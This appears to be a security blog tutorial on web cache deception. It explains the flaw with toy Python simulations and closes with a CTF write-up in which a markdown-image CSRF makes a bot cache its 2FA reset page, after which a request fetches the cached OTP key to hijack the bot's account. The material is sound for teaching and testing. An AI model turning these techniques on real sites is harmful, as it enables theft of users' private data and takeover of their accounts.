Web Cache Deception attacks

Do you have vulnerabilities that you just love to exploit? I know I have a few, and one of them is web cache deception. It is not so common to encounter this vulnerability, but better be ready when you do. In this article we’ll look into its details, using a CTF challenge as a demo application.

1. General concepts

This is a vulnerability specific to web applications and can occur when the following two conditions are met:

  • A caching server/component between client and web application that will cache responses based on one or more criteria
  • An endpoint within the web application that will perform partial/regex matching on routes

To make the second condition clearer, let’s take an example: when the client makes a request to /profile/non-existing-route, the web application will match the requested route to /profile instead of returning a 404 error message.

Now, let’s describe the whole flow assuming both conditions are present. User X makes a request to /my-profile/main.css. The web server matches the requested path to /my-profile/ and generates the corresponding response. However, the caching server detects that the requested route ends with .css and decides to cache the response without checking whether the response’s content is indeed CSS. From now on, anyone who requests the route /my-profile/main.css will, in fact, get the same response that user X received.
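To make the flow more concrete, here is a minimal sketch of it as a toy simulation. Nothing here talks to a real server: the `backend` function, the `NaiveCache` class and the list of extensions are assumptions made up for illustration, and a real caching server has many more rules.

```python
from typing import Callable, Dict, Optional

# Assumption: the toy cache treats these extensions as static content.
STATIC_EXTENSIONS = (".css", ".js", ".png")


def backend(path: str, user: Optional[str]) -> str:
    """Toy web application that prefix-matches the /my-profile route."""
    if path.startswith("/my-profile"):
        if user is None:
            return "302 redirect to /login"
        return f"profile page of {user}"
    return "404 not found"


class NaiveCache:
    """Toy cache that keys on the path only and trusts the file extension."""

    def __init__(self, origin: Callable[[str, Optional[str]], str]):
        self.origin = origin
        self.store: Dict[str, str] = {}

    def get(self, path: str, user: Optional[str] = None) -> str:
        if path in self.store:
            # Served straight from the cache, the backend is never contacted.
            return self.store[path]
        body = self.origin(path, user)
        if path.endswith(STATIC_EXTENSIONS):
            # Cached without checking that the body is really a stylesheet.
            self.store[path] = body
        return body


cache = NaiveCache(backend)
victim_view = cache.get("/my-profile/main.css", user="X")
attacker_view = cache.get("/my-profile/main.css")  # no session at all
print(attacker_view)
```

The unauthenticated second request receives the page that was generated for user X, while a request to the plain /my-profile route without a session is still sent to the login page.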

If things are not clear yet, just bear with me till the end.

2. Particularities

The impact of this vulnerability can vary depending on what endpoints are vulnerable. Typically, caching servers will cache only responses to GET and HEAD requests. Since most modern applications do not use these methods for modifying data or for sensitive operations, it would not be possible to get the cached login response, for example.

Another thing is that we must force the victim to perform the initial request, and that would, most of the time, mean that we’ll rely on the HTTP GET method. So, we’re mostly limited to accessing unauthorized data that is returned from GET requests. It may sound bad, but it is actually more than enough.

Think about all the data that is returned using GET requests. It might be the user’s personal information, a dashboard with all application’s users or even credit card information.

Before discussing how we can launch this attack against an application’s legitimate user, let’s take a closer look at how the vulnerability is executed using the diagram below.

Let’s assume we have a way to force the admin user to perform a request to /all-users/main.css using their session. The request will pass through the caching server, where a caching rule for CSS files will be triggered. Now, the caching server will pass the request to the web server, but it will also wait for its response in order to cache it. The web server matches the requested path to the endpoint /all-users and computes the necessary data for it. Once done, it sends the response to the caching server, where the response will be cached and passed forward to the admin user.

As attackers, the only thing we have to do now is to make a request to the cached path: /all-users/main.css. The caching server will return the same response the admin got, since it has it cached. What’s nice is that we don’t even need to be authenticated. Even more, our request is not even passed to the web server, so the only component that will know we accessed that response is the caching server, which might not have logging configured.

The execution of a web cache deception attack

What have we accessed? Well, let’s assume that the response contained a paginated list of 10-25 users with their email addresses and other PII (personally identifiable information). This would enable us to perform password attacks against the identified accounts or to target the application’s users with spear phishing emails.

3. Attack delivery

How will you force another user to make the initial GET request? Let’s go through some options.

To make this more practical, we’ll use the application from section 5, which is a challenge from HTB Cyber Apocalypse 2022 CTF called Genesis Wallet’s Revenge. As a short introduction, the challenge required us to bypass the 2FA of another account controlled by a bot. This can be done by making the bot visit the /reset-2fa endpoint so that the response will be cached. Next, we can access the cached response and configure its 2FA on our end.

3.1 Cross-domain Cross-Site Request Forgery (CSRF)

Send the victim a phishing email or trick them in any other way into clicking the malicious URL.

Here’s a quick PoC in HTML:

<!DOCTYPE html>
<html>
<head></head>
<body>
    <h2>PoC</h2>
    <a href="http://localhost:1337/en/reset-2fa/main.css">Click me</a>
</body>
</html>

For the sake of it, we hosted the webpage on an EC2 instance to better mimic an attack over the internet using different domains.

The next screenshot shows how, once the link was clicked, the browser adds the cookies in the request. This will result in the caching of the response under the session of the user that clicked the link.

Cookies added when user clicks link

However, this can’t be done if the cookie has the SameSite flag set to Strict. On the other hand, if SameSite is set to None, we can use an image tag to perform the request, which would be great since the request will be made automatically when the HTML is rendered.

The image tag variant will also not work if the target has configured their browser to block third-party cookies.
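The cookie rules above can be summed up in a small decision function. This is only a simplified model of how browsers treat SameSite: the function name and parameters are made up for illustration, and it ignores the Secure flag, cookie scope, browser defaults for cookies without the attribute, and third-party cookie blocking.

```python
def cookie_is_sent(same_site: str, cross_site: bool,
                   top_level_navigation: bool, method: str = "GET") -> bool:
    """Simplified model: would the browser attach the session cookie?"""
    if not cross_site:
        # Same-site requests always carry the cookie.
        return True
    policy = same_site.lower()
    if policy == "none":
        # Sent on every cross-site request, including <img> subresources.
        return True
    if policy == "lax":
        # Sent only when the user navigates the top-level page with GET,
        # for example by clicking a link.
        return top_level_navigation and method.upper() == "GET"
    # "strict" (and anything unknown) is treated as never sent cross-site.
    return False


# Clicking a link on the attacker's page:
print(cookie_is_sent("Lax", cross_site=True, top_level_navigation=True))
# An <img> tag on the attacker's page:
print(cookie_is_sent("Lax", cross_site=True, top_level_navigation=False))
```

In this model the clickable link works for None and Lax cookies, while the zero-click image tag works only for None.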

3.2 CSRF under the same domain

Here we can launch the attack without requiring user interaction. However, the web application must be vulnerable to something that would lead to a CSRF, such as XSS, HTML Injection, Open redirect etc.

In some cases, as we’ll see in the demo section, a built-in feature can be enough for launching a CSRF attack and caching a sensitive page.

4. Reverse engineer the caching rules

You identified a web application as being vulnerable, but you did it by first accessing /my-profile/main.css from your session and then accessing the cached response from an incognito window without a session.

Is the application indeed vulnerable? What if the response is cached based on the client’s IP? This means that you can conduct the attack only if you have the same IP as your target.

Knowing the caching rules can help you better assess the risk of the vulnerability and its likelihood of being exploited. It will also help you create a PoC or attack vector.

Here is a list of what rules are most important to determine:

  1. Is caching based on IP?
    • Make the same request and try to access its cached version from another external IP
    • If the attack can’t be performed over the internet, then the risk is highly reduced
  2. What extensions trigger the caching rule?
    • Check if the caching is triggered for common extensions like .css, .js, .ico, .png etc.
    • This will help you determine what your options are and in some cases it might help you bypass various restrictions when launching the attack
  3. Is the caching based on one/more HTTP headers?
    • Caching servers can be configured to map the cached responses with the value from an HTTP header
    • If that header is not present, the configuration can contain one backup HTTP header and so on
    • Remove one header at a time and see if you still get the cached response
    • If you don’t, cache the response for another route, but without sending the previously identified header
    • Repeat this until you can’t exploit the vulnerability anymore
    • This will give you a list of the headers used for mapping the cached response
    • It is important to send the same header value as the target in order to get their response
  4. For how long is the response cached?
    • You might get this information from the response’s headers
    • If you don’t, cache a response and access it at various time intervals
    • The smaller the time interval, the smaller the risk
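The header elimination procedure from point 3 can be sketched as a small loop. This is a hedged sketch, not a ready-made tool: `prime` and `replay_hits` are hypothetical callables you would implement yourself (the first caches a response for a path with the given headers, the second replays the request and reports whether the cached response came back), and `FakeCache` plus the `X-Client-Id` header are invented stand-ins so that the example runs offline.

```python
from typing import Callable, Dict, List, Optional, Set, Tuple

Headers = Dict[str, str]


def find_key_headers(prime: Callable[[str, Headers], None],
                     replay_hits: Callable[[str, Headers], bool],
                     headers: Headers) -> List[str]:
    """Return the headers the cache keys on, in fallback order."""
    remaining = dict(headers)
    key_headers: List[str] = []
    attempt = 0
    while remaining:
        path = f"/my-profile/probe{attempt}.css"  # fresh route for every round
        prime(path, remaining)
        culprit = None
        for name in remaining:
            trimmed = {k: v for k, v in remaining.items() if k != name}
            if not replay_hits(path, trimmed):
                culprit = name  # dropping this header lost the cached response
                break
        if culprit is None:
            break  # none of the remaining headers influences the cache key
        key_headers.append(culprit)
        del remaining[culprit]
        attempt += 1
    return key_headers


class FakeCache:
    """Stand-in cache keyed on the path plus the first header of a fallback chain."""

    def __init__(self, chain: List[str]):
        self.chain = chain
        self.keys: Set[Tuple[str, Optional[str], Optional[str]]] = set()

    def _key(self, path: str, headers: Headers):
        for name in self.chain:
            if name in headers:
                return (path, name, headers[name])
        return (path, None, None)

    def prime(self, path: str, headers: Headers) -> None:
        self.keys.add(self._key(path, headers))

    def replay_hits(self, path: str, headers: Headers) -> bool:
        return self._key(path, headers) in self.keys


fake = FakeCache(["X-Client-Id", "User-Agent"])
found = find_key_headers(
    fake.prime, fake.replay_hits,
    {"Accept": "*/*", "User-Agent": "UA-1", "X-Client-Id": "42"},
)
print(found)
```

Against a real cache, keep in mind that a replay that misses may itself be cached under a different key, which is one more reason to use a fresh route for every round.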

4.1 Using the information

How to use this information? Depends on your context, but here is an example:

  • The web cache deception can be exploited over the internet
  • Only the .css extension triggers the caching
  • The caching is mapped based on User-Agent HTTP header
  • The response is cached for 5 minutes
  • And let’s say that we can force another user to make the initial request via an HTML Injection vulnerability

We can inject an HTML payload with two image tags. The first one will point to the target endpoint that we want to cache, followed by /main.css, and the second one will point to an endpoint we control.

We’ll set up a listener on the endpoint we control so that we know when it was accessed. Since we only have 5 minutes, we must automate the process. When the listener is triggered, we’ll start a script that requests the target endpoint followed by /main.css with various user agents until we guess the one used by our target user. Once found, we save the content for further examination.
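The guessing part of that script could look roughly like the sketch below. The `fetch` and `is_victim_response` callables are assumptions: in a real run `fetch` would send an HTTP request with the given User-Agent, and the check would depend on what the target page contains. Here a fake fetcher and made-up user agent strings are used so the logic can be followed offline.

```python
from typing import Callable, Iterable, Optional, Tuple


def guess_user_agent(fetch: Callable[[str, str], str],
                     url: str,
                     candidates: Iterable[str],
                     is_victim_response: Callable[[str], bool]
                     ) -> Optional[Tuple[str, str]]:
    """Try each User-Agent until the cached victim response comes back."""
    for user_agent in candidates:
        body = fetch(url, user_agent)
        if is_victim_response(body):
            return user_agent, body  # keep the body for further examination
    return None


# Hypothetical stand-in for the cache: only the victim's UA maps to the data.
VICTIM_UA = "Mozilla/5.0 (victim-browser)"


def fake_fetch(url: str, user_agent: str) -> str:
    if user_agent == VICTIM_UA:
        return "email: admin@example.test"
    return "Please log in"


result = guess_user_agent(
    fake_fetch,
    "/all-users/main.css",
    ["curl/8.0", "Mozilla/5.0 (other)", VICTIM_UA],
    lambda body: "Please log in" not in body,
)
print(result)
```

In practice the candidate list would be ordered by how common each user agent is, since the whole loop has to finish before the cached entry expires.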

5. Demo

For this, we will use the provided source of the challenge Genesis Wallet’s Revenge from HTB Cyber Apocalypse 2022. This will be just a short write-up, focused on the exploitation of a web cache deception vulnerability. For more details, check the task’s write-ups from CTF Time.

The challenge involves a web application where you can perform transactions involving a custom currency. If we have over 1337 of this currency and we are not the bot, we get the flag. The challenge description gives us the credentials used by the bot, but we need 2FA in order to log in or perform transactions. One important detail is that the bot checks the transactions once we make one.

So, we need to bypass the bot’s 2FA in order to log in to its account and send its balance to ourselves. Looking at the provided source code, we can notice a configuration for a Varnish caching server.

vcl 4.1;

backend default {
    .host = "127.0.0.1";
    .port = "1337";
}

sub vcl_hash {
    hash_data(req.url);

    if (req.http.host) {
        hash_data(req.http.host);
    } else {
        hash_data(server.ip);
    }

    return (lookup);
}

sub vcl_recv {
    # Only allow caching for GET and HEAD requests
    if (req.method != "GET" && req.method != "HEAD") {
        return (pass);
    }
    # get javascript and css from cache
    if (req.url ~ "(\.(js|css|map)$|\.(js|css)\?version|\.(js|css)\?t)") {
        return (hash);
    }
    # get images from cache
    if (req.url ~ "\.(svg|ico|jpg|jpeg|gif|png)$") {
        return (hash);
    }
    # get fonts from cache
    if (req.url ~ "\.(otf|ttf|woff|woff2)$") {
        return (hash);
    }
    # get everything else from backend
    return(pass);
}

sub vcl_backend_response {
    set beresp.ttl = 120s;
}

sub vcl_deliver {
    if (obj.hits > 0) {
        set resp.http.X-Cache = "HIT";
    } else {
        set resp.http.X-Cache = "MISS";
    }

    set resp.http.X-Cache-Hits = obj.hits;
}

Reading the configuration file we can see that:

  • It forwards the requests to a back-end server running at 127.0.0.1:1337
  • The cached responses are keyed on the request URL together with the Host HTTP header (or the server’s IP if this header is not present)
  • It caches responses from GET or HEAD HTTP requests
  • It caches based on multiple extensions: css, js, map, png, ico, ttf, woff etc.
  • The responses are cached for 2 minutes
  • If the “X-Cache” HTTP header within the response has the value “HIT” it means we got a cached response (and “MISS” if the response is not a cached one)
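To check which URLs would be handed to the cache, the rules from vcl_recv can be replayed in a few lines. This is a sketch that mirrors only the method check, the three regular expressions and the vcl_hash key from the configuration above; the function names are made up, and Python’s `re.search` is used as a stand-in for Varnish’s unanchored `~` operator.

```python
import re
from typing import Tuple

# The three patterns are copied from the vcl_recv block of the configuration.
CACHE_RULES = [
    re.compile(r"(\.(js|css|map)$|\.(js|css)\?version|\.(js|css)\?t)"),
    re.compile(r"\.(svg|ico|jpg|jpeg|gif|png)$"),
    re.compile(r"\.(otf|ttf|woff|woff2)$"),
]


def is_cacheable(method: str, url: str) -> bool:
    """Mirror vcl_recv: only GET/HEAD requests whose URL matches a rule."""
    if method not in ("GET", "HEAD"):
        return False
    return any(rule.search(url) for rule in CACHE_RULES)


def cache_key(url: str, host: str) -> Tuple[str, str]:
    """Mirror vcl_hash when a Host header is present: URL plus Host."""
    return (url, host)


print(is_cacheable("GET", "/en/reset-2fa/main33.css"))
print(is_cacheable("GET", "/en/reset-2fa"))
print(cache_key("/en/reset-2fa/main33.css", "127.0.0.1"))
```

The second value of the key is why the Host header matters later on: the same URL requested with a different Host is a different cache entry.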

Remember the requirements for this vulnerability? One was to have a caching server (checked) and the second one was to have endpoints with partial matching of their route. Looking through the source code, we can identify the following endpoints that satisfy this condition:

router.get(/^\/(\w{2})?\/?(setup|reset)-2fa/, AuthMiddleware, async (req, res) => { ...

router.get(/^\/(\w{2})?\/?2fa/, AuthMiddleware, (req, res) => { ...

router.get(/^\/(\w{2})?\/?dashboard/, AuthMiddleware, async (req, res) => { ...

router.get(/^\/(\w{2})?\/?transactions/, AuthMiddleware, async (req, res) => { ...

router.get(/^\/(\w{2})?\/?settings/, AuthMiddleware, async (req, res) => { ...

For solving the challenge, we’ll focus on the first endpoint which can be used to get a new OTP key for configuring the 2FA.
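The partial matching is easy to verify by translating the first route’s regular expression into Python. This is only a sketch: the pattern is the one from the router above, `re.ASCII` is added so that `\w` behaves like it does in JavaScript, and the helper name is made up.

```python
import re

# Same pattern as the first router.get() call; note there is no "$" at the end.
RESET_2FA_ROUTE = re.compile(r"^/(\w{2})?/?(setup|reset)-2fa", re.ASCII)


def route_matches(path: str) -> bool:
    """True when the route pattern matches the beginning of the path."""
    return RESET_2FA_ROUTE.match(path) is not None


for path in ("/en/reset-2fa", "/en/reset-2fa/main33.css", "/en/login"):
    print(path, route_matches(path))
```

Because the pattern is anchored only at the start, anything appended after reset-2fa, including a fake stylesheet name, still reaches the same handler.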

One more thing now. We need a way to perform CSRF so that the bot visits our malicious link. For this we’ll abuse a built-in functionality that lets us send a note along with a transaction. This note can contain markdown, including images. This will be our injection point for forcing the bot to make the target request.

Make transaction with CSRF payload

Once we validate the 2FA for this transaction, the balance will be updated, the bot will check the transaction and, once the markdown is rendered, a request using the bot’s session will be made to the route http://127.0.0.1/en/reset-2fa/main33.css.
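The exact note from the screenshot is not reproduced here, but a markdown image pointing at the route mentioned above would be enough to trigger the request. The helper below is a hypothetical sketch for building such a note; the function name, the alt text and the idea of changing the file name for each attempt are assumptions.

```python
def build_note(cache_origin: str, lang: str, file_name: str) -> str:
    """Build a markdown image whose URL is the route we want cached."""
    # A fresh file name per attempt avoids reusing an already cached entry.
    target = f"{cache_origin}/{lang}/reset-2fa/{file_name}.css"
    return f"![receipt]({target})"


note = build_note("http://127.0.0.1", "en", "main33")
print(note)
```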

Now, the only thing left for us to do is to make a request to the route /en/reset-2fa/main33.css with the Host header set to 127.0.0.1. The Host header matters because the bot made its request to 127.0.0.1 and the cache key includes that value. At this point, the caching server will return the cached response given to the bot, which contains the OTP key required for configuring 2FA.
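A minimal sketch of that final request with Python’s standard library is shown below. The base URL `http://challenge.example:8080` is a placeholder for wherever the challenge instance is exposed, and the function names are made up; only the path, the Host value and the X-Cache header come from the challenge.

```python
import urllib.request
from typing import Tuple


def build_cached_request(base_url: str, path: str,
                         host: str = "127.0.0.1") -> urllib.request.Request:
    """Prepare a GET request whose Host header matches the bot's request."""
    return urllib.request.Request(
        base_url.rstrip("/") + path,
        headers={"Host": host},
        method="GET",
    )


def fetch_cached(request: urllib.request.Request,
                 timeout: float = 5.0) -> Tuple[str, str]:
    """Send the request and return the X-Cache value and the body."""
    with urllib.request.urlopen(request, timeout=timeout) as response:
        cache_status = response.headers.get("X-Cache", "")
        body = response.read().decode("utf-8", errors="replace")
    return cache_status, body


# Placeholder address: replace it with the real challenge instance.
request = build_cached_request("http://challenge.example:8080",
                               "/en/reset-2fa/main33.css")
print(request.full_url, request.get_header("Host"))
```

Calling `fetch_cached(request)` within the 2 minute window should return "HIT" as the cache status if the bot’s response was stored, and the body is then the page with the OTP key.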

To complete the challenge, we must configure the 2FA, log in to the bot’s account and transfer its funds into our account.

This challenge is a very good example of how exploiting a vulnerability that affects the confidentiality of the system can lead, in fact, to a breach of integrity (by transferring the funds) and availability (by changing the user’s 2FA and blocking access to their account).

6. Final thoughts

Web cache deception requires a few conditions in order to be exploitable and it might not be so common, but it can lead to serious security issues.

It all comes down to what endpoint is vulnerable, what can be exfiltrated from it in order to be used in other attack vectors and what the caching rules are.

I hope you now have an idea of what this vulnerability is, what you need to exploit it, how to reverse engineer the caching rules and what the vulnerability can lead to when exploited.
